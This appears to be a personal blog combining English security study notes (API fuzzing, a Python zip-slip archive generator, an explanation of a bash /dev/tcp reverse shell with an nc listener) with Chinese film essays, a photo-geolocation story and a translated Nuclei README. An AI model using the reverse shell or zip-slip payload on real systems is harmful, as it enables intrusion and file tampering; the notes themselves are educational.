FUZZ in work

Yesterday, I used FUZZ for the first time in my work. It's so cool, I have decided to write a blog about it.

What is FUZZ?

Fuzz or fuzzing is a technique used in computer programming and software testing. It involves providing invalid, unexpected, or random data as input to a program or system in order to identify vulnerabilities, bugs, or abnormal behavior.

FUZZ in work

Yesterday, while testing a system, I discovered many paths using a browser plugin that called FindSomething.

So I use these paths to test the system by yakit, and select the paths with 200 of status code.

Among these paths, I discovered a registration API that returns some error codes.

So I use FUZZ to test this API.

Based on testing experience, APIs like this one are usually accessed using POST requests. Therefore, I started fuzzing the parameters using POST.I guess the registration API is the same as login API format.

The fuzz dict is from https://github.com/TheKingOfDuck/fuzzDicts.

However, after fuzzing, I couldn't find the first parameter.The GET requests maybe tested.

I'm happy when I find a response packet that is different from the others after using GET to test this API.

Following the same approach, I got a complete request packet.

This is my first fuzzing result.It's so cool.

ZIP slip vulnerability

Today a workmate shared with me a vulnerability that called kingdee-Apusic-deployApp-upload. In this vul, I find request body is a zip file, but it's not successful that I want to modify this zip file in the request body. Finally, I found this vul is called zip-slip.

Directory traversal

I believe every programmer of cyber security knows about directory traversal vul. This vulnerability allows bypassing the application's access control by inserting ../. We can use ../ to access directories outside of the current directory, and download/read/write file in other directories.

Zip slip

zip slip is a type of directory traversal vul, We can upload a evil zip file, if the file is extracted, we will write a file into a directory where we intend.

How to create a zip file with zip slip? I find codes from zhihu

import zipfile
# the name of the zip file to generate
zf = zipfile.ZipFile('out.zip', 'w')
# the name of the malicious file that will overwrite the origial file (must exist on disk)
fname = 'sec_test.txt'
#destination path of the file
zf.write(fname, '../../../../../../../../../../../../../../../../../../../../../../../../tmp/sec_test.tmp')

This code creates a zip file named out.zip. And we can upload this zip file to the web which have directory traversal vul, and the zip file is extracted, and a file will be written into a directory.

刚才看完了《红猪》，虽然我收藏所有吉卜力工作室蓝光原盘的电影，但是《红猪》我却没有看过一次，今天看完了以后发现《红猪》是讲给成人的浪漫主义电影，讲自由、感情、战争、梦想、海和天空。我非常喜欢具有浪漫主义色彩的电影，《红猪》成为了我最喜欢的吉卜力工作室的电影。

我还记得我第一次看吉卜力工作室电影的时候，应该是我上初中的一个周末，那天阳光明媚，就和今天一样，我和妈妈坐在沙发看书，我看书看的倦了，央求着妈妈和我一起看我偷偷从电脑上下载的《天空之城》，在我的软磨硬泡下，妈妈答应和我一起看。这是我第一次接触吉卜力工作室的电影，电影中碧蓝的天空、翠绿的树林以及深邃的海水给我留下了深刻的印象。后来我又自己一个人看了很多吉卜力工作室的电影，每一部让我陶醉，曾经我非常喜欢具有冒险精神的《天空之城》，随着年龄的增长，现在看起来浪漫主义的《红猪》更合我的胃口。

《红猪》剧情简单平淡，更像是一篇流水账，前半段我甚至不太明白这部电影是要干什么，但是随着剧情的发展，我开始集中注意力，因为菲奥的一句话狠狠地戳中了我：“一个专业的机械师是必备的。”一个好的飞艇驾驶员怎么能少了一个专业的机械师呢？这让我想起了江南在《龙族》和《天之炽》中的场景，果然这么多年过去了，我还是很喜欢这一套。

我最喜欢的几部宫崎骏导演的电影都有这种复古且具有机械感的交通工具，非常蒸汽朋克，各种简单的机械结构奇妙地组合在一起就能完成复杂的功能，在《哈尔的移动城堡》和上面说的《天空之城》以及今天看的《红猪》中的飞行器上都有出现，它们的外观充满了曲线和齿轮，机翼和螺旋桨融入了古典和机械的元素，飞行器穿梭在浩瀚的天空，不仅承载了梦想和幻想的起点，尤其是《红猪》中的飞艇，更是成为了一种自由的象征，宫崎骏通过这些细腻的机械结构将科技和人文巧妙的融合，让我对蒸汽朋克着迷。

豆瓣上有人说：天空和大海陶冶出来的人，都是善良的。确实，在我看过的吉卜力工作室电影中，天空和大海的描写都传达出深沉而美好的感觉。《红猪》的天空是重要的、决胜负的舞台，波鲁克驾驶着飞艇在天空中盘旋，在云层中穿梭，追逐着自由。电影中的大海广阔且深邃，是波鲁克休息的地方，同时也是他寻找自我和思考人生的场所，大海承载着他的过去，与他的故事交相辉映。

吉卜力工作室中有很多反战的电影，《红猪》也不例外，虽然整部电影没有任何战争画面，但是还是能从只言片语中发现战争的残酷：男人们都上了战场、女人们在后方赚钱糊口。我想起了《上甘岭》中的插曲《我的祖国》这首歌，整首歌没有一个字讲战争，讲壮丽的山河、讲秀美的景色、讲勤劳的人民，讲“朋友来了有好酒，若是那豺狼来了有猎枪。”讲我们不屈的民族精神。

王国维说：“一切景语皆情语。”中国传统诗词喜欢通过各种意象来表达作者的感情，比如：“关关雎鸠在河之洲”、“小桥流水人家，古道西风瘦马”、“楼船夜雪瓜洲渡，铁马秋风大散关”，宫崎骏似乎也很喜欢通过各种意象来表达他的感情，尤其《红猪》还是他因个人兴趣制作的电影，波鲁克这位红猪本来就是一种意象，波鲁克样貌的变化体现了他内心的矛盾以及过去对他的困扰，成为赏金猎人体现了他的自由、独立、反叛。飞艇也是意象，是冒险和生活方式的象征。宫崎骏通过波鲁克这位红猪和飞艇等意象，以及对大海和天空的描绘，将情感融入了自然景物之中，通过这些富有意象的元素，使得这部电影成为一个不仅仅是动画作品，更是一个充满诗意和人性思考的艺术品。

The commands of reverse shell

I read an answer about Linux commands on zhihu, which details stdin, stdout, stderr and redirection. When I finished reading, I found that I could not understand the meaning of the Linux command in the reverse shell. So I wirte this article.

I introduced the reverse shell before. At that time, I just learned hack, so in that article, I just briefly introduced the shell, but with the further study, I think it's necessary to understand the reverse shell again.

we can reverse shell with bash -i >& /dev/tcp/192.168.0.1/8080 0>&1, this commands allowed display on prot 8080 of 192.168.0.1. But why? Maybe this article can solve this problem.

Everything is a file

In the reverse shell, it embodies the concept of everything is a file. /dev/tcp is a special file, through this file, we can send requests to the specified IP/domain and port. When this file is opened(the file isn't real), a socket connection is established. So /dev/tcp/192.168.0.1/8080 means this host has established a socket connection with prot 8080 of 192.168.0.1. Although the connection is established, but why the commands are displayed on screen of 192.168.0.1?

Stdin, stdout and stderr

stdin, stdout and stderr are all file descriptors. In Linux, stdin is number zero, and stdout is number one, stderr is number two. When we get Linux up, these three file descriptors will be started. we can get stdin throuth the keyborad and see stdout\stderr on the display. Usually stdout and stderr are displayed on the display, but if it's to be output to a file or other device, we need use redirection.

Redirection

Redirection is a concept in the Shell. Through redirection, it's to be output to a file or other device. In Shell, < and << are called input redirection. > and >> are called output redirection.

Input redirection

command 0< file means that we redirect file to command. Of course, we can omit zero.

Output redirection

command >1 file means that we redirect the output of command to file. Also, this number is omiited.

We can also redirect sdterr to stdout, such as command 2>&1 file or command >& file

Reverse shell

bash -i can create an interactive terminal. When we use nc -lvp 4444 on attack vps and use bash -i >& /dev/tcp/192.168.0.1/8080 0>&1 on attacked vps, we can send command by attack vps and execute the command on attacked vps. at the same time, the results of the attacked vps can be got on the attack vps.

The bash -i >& /dev/tcp/192.168.0.1/8080 0>&1 is written as bash -i > /dev/tcp/192.168.0.1/8080 0>&1 2>&1.The output of interactive terminal of attacked vps redirected to prot 8080 of 192.168.0.1, 0>&1 and 2>&1 means that the input of attack vps redirected to the interactive terminal and that the error of attacked vps redirected to port 8080 of 192.168.0.1.

This is the reverse shell.

图片找地址_1

昨天看到一位认识的网友发了两张她家附近的照片，我告诉她我可以通过照片找到她家的位置，征得同意后我开始了根据图片找地址。

首先因为她的IP定位在XX，所以我只需要在XX省里找就可以了。

先看一下这两张图

首先在YY找一下，发现一座系杆拱桥，但是是南北走向的河。

接着我们沿着T江在ZZ找到了一座系杆拱桥，同时发现这里的T江是东西走向。

在这座桥的北边有一座很大的建筑，看着很像第一张照片左边的建筑。

这个建筑的旁边刚好有一座楼，楼顶是天线。

在第一张图的右下角有一座建筑，建筑的最上面是蓝色的，中间镶嵌着红色，同事在附近的路上通过百度街景发现了这一建筑，刚好符合第二张图中蓝色建筑旁边是一座玻璃外墙的大楼

通过第二张图发现左边是红色屋顶的建筑，所以我们把具体的位置锁定在红色的框中

刚开始因为两张图中没有操场，所以我和同事一致认为在红框的右半边，但是右半边并没有比较高的楼适合拍照。

一筹莫展之际，我和同事发现第二张图右边的白色建筑是一个L型的，刚好和学校对的上，于是我们把具体位置锁定到了学校北边的小区。

根据第二张图近景有两个白色的球状物，发现学校北边刚好有两个白点，且白点的北边刚好是一座高层小区。

我将结果告诉了这位朋友，她肯定了我的结果。

今天国庆放假，终于有时间可以写一写我在补习学校一个半月的经历和感悟。在这90天里，感到自己成长了很多，突然有了饱经沧桑的感觉，自己觉得自己长大了。以前总有大人说我长大了，我笑笑不应声，因为我老感觉自己还没有长大，可是我现在终于可以说我长大了，不仅仅是生理上的还有心理上的。有人说人只有在经历一些失败和挫折后才能明白过去的美好，失去了才懂得珍惜。我想是的，经过一次高考失利后，才明白岁月蹉跎。套用我现在化学老师经常说的话：“我们要用辩证的思维来看待世界。”古语有云：“塞翁失马焉知非福。”换个角度来想，这何尝不是一种好事呢？就在这仅仅90天里，我就明白了一些道理，解开了一些萦绕在心里的问题。我们都是突然长大的！

2015年8月15日，星期六，这应该是我目前在人生道路上做出的最重要的决定——来到补习学校为了来年的高考继续努力。这一天阳光明媚，似乎和我的心情有很大的差别，由于网络的发达，我没有一丝的紧张和焦虑，非常期待能见到在这一年里和我并肩战斗的同学。但同时又担心巨大的压力和紧张的气氛让我受不了，还好目前还在我的承受范围之内。这些压力和紧张感给了我十足的动力，让我每天起早贪黑。

报完名下午没事，我在宿舍睡觉，睡得满头大汗，一觉醒来，太阳已经渐渐偏西，我们宿舍刚好是西晒，阳光透过玻璃洒在乳白色的地板上，给人一阵温暖。恍惚之间，我仿佛又回到了我高三的教室，同样是一个这样的午后，我在教室后面静静地看完了职烨写的《花开不败》，我被这个柔弱女孩内心的坚强所震撼。当时我只是被触动了一下，经过一次高考失利以后，我才被这种执着所震撼，才明白学习的意义。我暗下决心要在这一年里好好地拼一把，给自己一个完美的答案。我看着宿舍里其他还在睡觉的人，心里想：这会是一个怎样的一年呢？舍友不知道好不好相处呢？随着下午的宿舍的聚餐，我现在可以回答出第二个问题了，他们都是很好相处的人，虽然在性格上有一些差异，但毫不影响我们之间的互帮互助、插科打诨。

正式上课已是在8月20日，班主任按照每个人的高考成绩排了座位，我的身边都是一群学霸，我感到十分的高兴，我想大家都是学霸，一定有着非常不错的学习习惯和学习技巧，我可得向他们学习。可是我的“学习”却影响了大家的学习，有天晚自习下，班主任把我留下来找我谈话，她觉得我很爱说话，会影响到周围人的学习，让我不要说话，我连忙应允以后不再影响他们学习。后来我反思自己的行为，其实我也不是很爱说，但是和学霸们比起来就相形见绌了，我默默地下决心以后要少说多做。

经过一周的上课，我对代课老师有了一个比较全面的了解，不愧是各大名校退休的老师，他们不仅上课认真，而且平易近人，让我有想学的欲望，他们深入浅出的教学方法让我受益匪浅，往往就是他们不经意的一句话就点醒了我这个梦中人。这些代课老师对高考考点有非常好的把握，句句都紧扣高考。我的语文老师出过高考卷，有20年的高考阅卷经历，还带过语文满分；我的物理老师有一个本子，记录了近十几年的高考中的好题，而且讲课条理清晰，头头是道；我的化学老师虽然已经年过古稀，但依旧头脑清晰，字字珠玑；我的生物老师更是厉害，高考题、生物课本全背过，知识点、考点随便问，都问不倒他，随口就会说出页码和所在的地方。我被这些老师深深地折服。

这里我想重点说一说我的化学老师，他对学习的认识非常深刻，让我有醍醐灌顶之感，他经常会说：“高中的化学是一个完整的体系，高考中99%的知识都可以用所学过的知识来解决。”我开始非常不屑，认为高考化学中的许多知识都没有讲过，可是随着时间的推移，我渐渐明白了老师这句话的意思。他认为小学初中之所以学习好的原因仅仅是靠死记硬背获取来的，而高中却是以理解为主。这就是许多孩子上高中以后成绩一蹶不振的主要原因，如果不进行理解性的记忆，那再多的题也是记不完的，只有靠理解性的记忆，将一个知识变为一类知识，做一道题懂一类题，这才是高中的记忆模式。这不仅仅在理科的学习上很有用，而且适合各类学科的学习。我正在努力地改变我的学习方法，将死记硬背转变成理解记忆，这或许是一种更好的学习方法，更科学。

在补习学校的这些天里，每个人都认真地学习，都努力着，像极了王远成笔下的上海，每个人都努力的活着，不苟且，不浑浑噩噩。有时上晚自习突然抬起头，发现大家都低着刷着题，笔尖和纸摩擦发出的沙沙声敲击着我的心脏。大家都这么努力，我怎么能不努力呢？学如逆水行舟，不进则退，这时候我就会默默地低下头继续追赶学霸的步伐。前几天学校开家长会，作为班干部我必须到场，过去我在家长会期间总是无所事事，而这次家长会我在隔壁的答疑室里安安静静地写着我的作业，没有老师的监督，我就这样写到家长会结束。家长会结束后，我的父亲给我说：“我看了你的作业，这些天的做的作业都快和你高三一年做的一样多了。”父亲走后，我又继续着我的学习。现在想起来，高三的确是没有好好学，不自觉。可是为什么现在的我却这么自觉呢？估计是长大了吧，人总是突然在一瞬间长大的，而我正是通过这次的失败长大了。暑假的时候和人在QQ上聊天，说的都是一些关于未来的规划和自己一些对世界的看法，当时觉得还没有啥，现在回头看来，我什么时候已经可以像一个大人一样的说话了，我还没有准备好长大就长大了。
今天下午放假回家，我一个人收拾了衣服，整理了被子，将他们放进了拉杆箱，和同学一起提着箱子走上了回家的路。放在过去，这些都不需要我自己收拾，肯定都会被父母收拾。我只需要双手插兜走在最前面，父母带着我需要的东西走在后面。回家的最后一段路，我是个人走的，走着走着我就觉得原来这就是长大了：有些事不需要父母操心也能做好了，有些事突然就知道了其中的内涵，有些事也能独挑大梁了。在我上小学时我买了一本《时间简史》，起初什么都看不懂，只是瞅瞅上面的图画。随着年龄的增长，学到的物理知识逐渐增多，我渐渐明白了其中的意思，每次我重新读《时间简史》都会有新的感悟，就像现在的我，每次看到过去看过的一句话、一些事就会有新的看法，我总是感觉我不像原来的自己了，我一直在想是不是有人控制了我的思想，现在看来是我长大了。我是一个特别喜欢思考的人，经常就会反思自己，也会思考别人，思考为什么我要这样，为什么别人要那样，总是以自己为中心，总认为别人是错的，只有我是对的，现在撞在了南墙上，头破血流才知道别人也有对的时候。可我这个人却从不后悔，宁肯撞死在南墙上也不会回头，我同学认为我偏执，的确，我就是很偏执。在补习学校的这些天里让我知道人外有天，“古人的话没有错的时候”这句话看来是没有错的，只有不断的努力才能让自己成为“别人家的孩子”。

静下心来，从浮华中出淤泥而不染，在喧闹中让自己成长。不恋尘世浮华，不写红尘纷扰，不叹世道苍凉，不惹情思哀怨，闲看花开，静待花落，冷暖自知，干净如始。

一念转，心释然。

我看见了流星
它从我的眼眸划过
落入了酒杯
打碎在夜空里

星星，星星
我不听使唤的双脚追不上你的大步流星
不要
我会把你拥入怀中

Nuclei新版README翻译及用法

以下为翻译正文：

基于YAML语法模板的定制化快速漏洞扫描器

工作流程 • 安装 • 对于安全工程师 • 对于开发者 • 文档 • 致谢 • 常见问题 • 加入Discord

English • 中文 • Korean

Nuclei使用零误报的定制模板向目标发送请求，同时可以对主机进行批量快速扫描。Nuclei提供TCP、DNS、HTTP、FILE等各类协议的扫描，通过强大且灵活的模板，可以使用Nuclei模拟各种安全检查。

我们的模板仓库包含超过300安全研究员和工程师提供的模板。

工作流程

安装Nuclei

Nuclei需要go1.18才能安装成功。执行下列命令安装最新版本的Nuclei

go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

更多的安装方式 请点击此处.

用法

nuclei -h

这将显示Nuclei的帮助，以下是所有支持的命令。

Nuclei是一款注重于可配置性、可扩展性和易用性的基于模板的快速漏洞扫描器。

用法：
  nuclei [命令]

命令：
目标：
   -u, -target string[]                  指定扫描的URL/主机
   -l, -list string                      指定需要扫描的URL/主机文件（一行一个）
   -resume string                        断点续扫（将禁用集群）

模板：
   -nt, -new-templates                   只扫描最新版本中添加的模板
   -ntv, -new-templates-version string[] 运行在特定版本中添加的新模板
   -as, -automatic-scan                  在自动web扫描中使用wappalyzer技术检测的指纹
   -t, -templates string[]               指定需要扫描的模板或者模板的路径（逗号分隔，文件）
   -tu, -template-url string[]           从URL加载模板（逗号分隔，文件）
   -w, -workflows string[]               指定扫描中的工作流或者工作流目录（逗号分隔，文件）
   -wu, -workflow-url string[]           从URL加载工作流（逗号分隔，文件）
   -validate                             验证通过的模板
   -nss, -no-strict-syntax               禁用模板的严格检查
   -tl                                   列出所有可用的模板

过滤：
   -a, -author string[]                  执行指定作者的模板（逗号分隔，文件）
   -tags string[]                        执行有标记的模板子集（逗号分隔，文件）
   -etags, -exclude-tags string[]        执行标记为排除的模板（逗号分隔，文件）
   -itags, -include-tags string[]        执行默认或者配置排除的标记模板
   -id, -template-id string[]            执行指定ID的模板（逗号分隔，文件）
   -eid, -exclude-id string[]            执行排除指定ID的模板（逗号分隔，文件）
   -it, -include-templates string[]      执行默认或配置中排除的模板
   -et, -exclude-templates string[]      要排除的模板或者模板目录（逗号分隔，文件）
   -em, -exclude-matchers string[]       在结果中排除指定模板
   -s, -severity value[]                 根据严重程度运行模板，可候选的值有：info,low,medium,high,critical   
   -es, -exclude-severity value[]        根据严重程度排除模板，可候选的值有：info,low,medium,high,critical
   -pt, -type value[]                    根据协议运行模板，可候选的值有：dns, file, http, headless, network, workflow, ssl, websocket, whois
   -ept, -exclude-type value[]           根据协议排除模板，可候选的值有：dns, file, http, headless, network, workflow, ssl, websocket, whois
   -tc, -template-condition string[]      根据表达式运行模板
   

输出：
   -o, -output string                    输出发现的问题到文件
   -sresp, -store-resp                   将nuclei的所有请求和响应输出到目录
   -srd, -store-resp-dir string          将nuclei的所有请求和响应输出到指定目录（默认：output）
   -silent                               只显示结果
   -nc, -no-color                        禁用输出内容着色（ANSI转义码）
   -json                                 输出为jsonL（ines）
   -irr, -include-rr                     在JSONL中输出对应的请求和相应（仅结果）
   -nm, -no-meta                         不显示匹配的元数据
   -nts, -no-timestamp                   不在输出中显示时间戳
   -rdb, -report-db string               本地的Nuclei结果数据库（始终使用该数据库保存结果）
   -ms, -matcher-status                  显示匹配失败状态
   -me, -markdown-export string          以markdown导出结果
   -se, -sarif-export string             以SARIF导出结果

配置：
   -config string                        指定Nuclei的配置文件
   -fr, -follow-redirects                为HTTP模板启用重定向
   -fhr, -follow-host-redirects          在同一主机上重定向
   -mr, -max-redirects int               HTTP模板最大重定向次数（默认：10）
   -dr, -disable-redirects               为HTTP模板禁用重定向
   -rc, -report-config string            指定Nuclei报告模板文件
   -H, -header string[]                  指定header、cookie，以header:value的方式（cli，文件）
   -V, -var value                        通过key=value指定var值
   -r, -resolvers string                 指定Nuclei的解析文件
   -sr, -system-resolvers                当DNS错误时使用系统DNS
   -passive                              启用被动扫描处理HTTP响应
   -ev, env-vars                         在模板中使用环境变量
   -cc, -client-cert string              用于对扫描的主机进行身份验证的客户端证书文件（PEM 编码）
   -ck, -client-key string               用于对扫描的主机进行身份验证的客户端密钥文件（PEM 编码）
   -ca, -client-ca string                用于对扫描的主机进行身份验证的客户端证书颁发机构文件（PEM 编码）
   -sml, -show-match-line                显示文件模板的匹配值，只适用于提取器
   -ztls                                 对ztls自动退回到tls13
   -sni string                           指定tls sni的主机名（默认为输入的域名）
   -i, -interface string                 指定网卡
   -sip, -source-ip string               指定源IP
   -config-directory string              重写默认配置路径（$home/.config）
   -rsr, -response-size-read int         最大读取响应大小（默认：10485760字节）
   -rss, -response-size-save int         最大储存响应大小（默认：10485760字节）

交互：
   -inserver, -ineractsh-server string   使用interactsh反连检测平台（默认为oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me）
   -itoken, -interactsh-token string     指定反连检测平台的身份凭证
   -interactions-cache-size int          指定保存在交互缓存中的请求数（默认：5000）
   -interactions-eviction int            从缓存中删除请求前等待的时间（默认为60秒）
   -interactions-poll-duration int       每个轮询前等待时间（默认为5秒）
   -interactions-cooldown-period int     退出轮询前的等待时间（默认为5秒）
   -ni, -no-interactsh                   禁用反连检测平台，同时排除基于反连检测的模板

限速：
   -rl, -rate-limit int                  每秒最大请求量（默认：150）
   -rlm, -rate-limit-minute int          每分钟最大请求量
   -bs, -bulk-size int                   每个模板最大并行检测数（默认：25）
   -c, -concurrency int                  并行执行的最大模板数量（默认：25）
   -hbs, -headless-bulk-size int         每个模板并行运行的无头主机最大数量（默认：10）
   -headc, -headless-concurrency int     并行指定无头主机最大数量（默认：10）


优化：
   -timeout int                          超时时间（默认为10秒）
   -retries int                          重试次数（默认：1）
   -ldp, -leave-default-ports            指定HTTP/HTTPS默认端口（例如：host:80，host:443）
   -mhe, -max-host-error int             某主机扫描失败次数，跳过该主机（默认：30）
   -project                              使用项目文件夹避免多次发送同一请求
   -project-path string                  设置特定的项目文件夹
   -spm, -stop-at-first-path             得到一个结果后停止（或许会中断模板和工作流的逻辑）
   -stream                               流模式 - 在不整理输入的情况下详细描述
   -irt, -input-read-timeout duration    输入读取超时时间（默认：3分钟）
   -no-stdin                             禁用标准输入

无界面浏览器：
    -headless                            启用需要无界面浏览器的模板
    -page-timeout int                    在无界面下超时秒数（默认：20）
    -sb, -show-brower                    在无界面浏览器运行模板时，显示浏览器
    -sc, -system-chrome                  不使用Nuclei自带的浏览器，使用本地浏览器
    -lha, -list-headless-action          列出可用的无界面操作

调试：
    -debug                               显示所有请求和响应
    -dreq, -debug-req                    显示所有请求
    -dresp, -debug-resp                  显示所有响应
    -p, -proxy string[]                  使用http/socks5代理（逗号分隔，文件）
    -pi, -proxy-internal                 代理所有请求
    -ldf, -list-dsl-function             列出所有支持的DSL函数签名
    -tlog, -trace-log string             写入跟踪日志到文件
    -elog, -error-log string             写入错误日志到文件
    -version                             显示版本信息
    -hm, -hang-monitor                   启用Nuclei的监控
    -v, -verbose                         显示详细信息
    -profile-mem string                  将Nuclei的内存转储成文件
    -vv                                  显示额外的详细信息
    -ep, -enable-pprof                   启用pprof调试服务器
    -tv, -templates-version              显示已安装的模板版本
    -hc, -health-check                   运行诊断检查

升级：
    -update                              更新Nuclei到最新版本
    -ut, -update-templates               更新Nuclei模板到最新版
    -ud, -update-directory string        覆盖安装模板
    -duc, -disable-update-check          禁用更新

统计：
    -stats                               显示正在扫描的统计信息
    -sj, -stats-json                     将统计信息以JSONL格式输出到文件
    -si, -stats-inerval int              显示统计信息更新的间隔秒数（默认：5）
    -m, -metrics                         显示Nuclei端口信息
    -mp, -metrics-port int               更改Nuclei默认端口（默认：9092）

运行Nuclei

使用社区提供的模板扫描单个目标

nuclei -u https://example.com

使用社区提供的模板扫描多个目标

nuclei -list urls.txt

Example of urls.txt:

http://example.com
http://app.example.com
http://test.example.com
http://uat.example.com

更多关于Nuclei的详细实例可以在这里找到

对于安全工程师

Nuclei提供了大量有助于安全工程师在工作流定制相关的功能。通过各种扫描功能（如DNS、HTTP、TCP），安全工程师可以更轻松的使用Nuclei创建一套自定义的检查方式。

• 支持多种协议：TCP、DNS、HTTP、FILE等
• 通过工作流和动态请求实现复杂的漏洞扫描

• 易于集成到CI/CD，旨在可以轻松的集成到周期扫描中，以主动检测漏洞的修复和重新出现

  

  
  
  

  对于赏金猎人： Nuclei允许您定制自己的测试方法，可以轻松的运行您的程序。此外Nuclei可以更容易的集成到您的漏洞扫描工作流中。 可以集成到其他工作流中 可以在几分钟处理上千台主机 使用YAML语法定制自动化测试 欢迎查看我们其他的开源项目，可能有适合您的赏金猎人工作流：github.com/projectdiscovery，我们还使用Chaos绘制了每日的DNS数据。

  对于渗透测试： Nuclei通过增加手动、自动的过程，极大地改变了安全评估的方式。一些公司已经在用Nuclei升级他们的手动测试步骤，可以使用Nulcei对数千台主机使用同样的流程自动化测试。 渗透测试员可以使用公共模板或者自定义模板来更快的完成渗透测试，特别是漏洞验证时，可以轻松的验证漏洞是否修复。 轻松根据您的要求创建标准清单（例如：OWASP TOP 10） 通过FUZZ和工作流等功能，可以使用Nuclei完成复杂的手动步骤和重复性渗透测试 只需要重新运行Nuclei即可验证漏洞修复情况

对于开发和组织

Nuclei构建很简单，通过数百名安全研究员的社区模板，Nuclei可以随时扫描来了解安全威胁。Nuclei通常用来用于复测，以确定漏洞是否被修复。

• CI/CD：工程师已经支持了CI/CD，可以通过Nuclei使用定制模板来监控模拟环境和生产环境
• 周期性扫描：使用Nuclei创建新发现的漏洞模板，通过Nuclei可以周期性扫描消除漏洞

我们有个讨论组，黑客提交自己的模板后可以获得赏金，这可以减少资产的漏洞，并且减少重复。如果你想实行该计划，可以联系我。我们非常乐意提供帮助，或者在讨论组中发布相关信息。

资源

• 使用PinkDraconian发现Nuclei的BUG (Robbe Van Roey) 作者：@PinkDraconian
• Nuclei: 强而有力的扫描器 作者：Bishopfox
• WAF有效性检查 作者：Fastly
• 在CI/CD中使用Nuclei实时扫描网页应用 作者：@TristanKalos
• 使用Nuclei扫描
• Nuclei Unleashed - 快速编写复杂漏洞
• Nuclei - FUZZ一切
• Nuclei + Interactsh Integration，用于自动化OOB测试
• 武器化Nuclei 作者：@dwisiswant0
• 如何使用Nuclei连续扫描？ 作者：@dwisiswant0
• 自动化攻击 作者：@DhiyaneshGeek

致谢

感谢所有社区贡献者提供的PR，另外您可以其他类似的开源项目：

FFuF, Qsfuzz, Inception, Snallygaster, Gofingerprint, Sn1per, Google tsunami, Jaeles, ChopChop

许可证

Nuclei使用MIT许可证